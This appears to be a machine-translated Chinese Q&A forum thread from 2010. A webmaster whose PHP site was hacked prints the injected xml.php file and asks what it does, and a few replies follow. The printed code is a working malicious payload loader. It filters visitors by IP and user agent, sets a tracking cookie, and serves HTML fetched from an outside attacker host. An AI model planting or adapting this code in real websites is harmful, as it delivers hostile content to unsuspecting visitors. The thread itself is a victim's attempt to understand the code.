編輯:迄今爲止工作良好。我剛剛被黑客入侵,但我不知道爲何如此重要。非常奇怪的代碼注入
我剛剛發現了這個幸福的下載,在我的bash的歷史跑:
(安全瀏覽)
感謝所有
我剛注意到我的網站的源php已被編輯。我不知道如何(自從我改變了所有密碼),但真正讓我困惑的是爲什麼。
在幾頁中放置了一個iframe,鏈接到一個xml.php文件,該文件放置在我的images目錄中(HTACCESS唯一可以訪問的目錄),因爲頁面相當複雜並沒有制動這些頁面自動地方本來幾乎是不可能的。
現在真的令人困惑的事情是這樣的XML.php文件的內容,因爲從我可以看到它什麼都不做。
這裏的代碼:
<?php
$urlIps = "http://mp3magicmag.com/frame/ips.txt"; // Url to IP's
$urlHtml = "http://mp3magicmag.com/frame/html.code"; // Url to html.code
$urlUa = "http://mp3magicmag.com/frame/ua.txt"; // Url to User Agent file
if(isset($_GET['ping'])){
echo "Status: Ping successful!"; die;
}
$ip = $_SERVER['REMOTE_ADDR'];
//orezaem do deapozona
$exIps = explode(".", $ip);
$ip = $exIps[0].".".$exIps[1].".".$exIps[2];
$ips = file_get_contents($urlIps);
if(strpos(" ".$ips, $ip)){ // esli nashli IP v file to ostanavlivaem process..
die;
}
$arrUa = file($urlUa);
for($ua=0; $ua<count($arrUa); $ua++){
$userAgent = trim($arrUa[$ua]);
if(strpos(" ".$_SERVER['HTTP_USER_AGENT'], $userAgent)){ // esli nashli v User Agent'e to ostanavlivaem process..
die;
}
}
if(isset($_COOKIE['pingshell'])){ // proveriaem est' li kuki
echo @file_get_contents($urlHtml);
}else{
?>
<SCRIPT LANGUAGE="JavaScript">
function setCookie (name, value, expires, path, domain, secure) {
document.cookie = name + "=" + escape(value) +
((expires) ? "; expires=" + expires : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") +
((secure) ? "; secure" : "");
}
</SCRIPT>
<SCRIPT LANGUAGE="JavaScript">
setCookie("pingshell", "12345", "Mon, 01-Jan-2099 00:00:00 GMT", "/");
</SCRIPT>
<meta http-equiv="refresh" content="2; url=">
<?php
}
?>
我錯過了什麼,還是這是最奇怪的「黑客」?我已經完成了我的搜索,並找不到任何參考。
你是什麼意思,它什麼也不做?這段代碼做了一些事情,它使用`file_get_contents`獲取了一些頁面,它輸出了一些東西(一些`echo`,甚至一些js的cookie),它使得瀏覽器刷新... – cambraca 2010-12-01 20:56:44
但是該文件檢索的URL是好像空着。 – Jon 2010-12-01 20:59:25
我很想知道那些評論的意思是什麼...... – Jonah 2010-12-01 21:01:02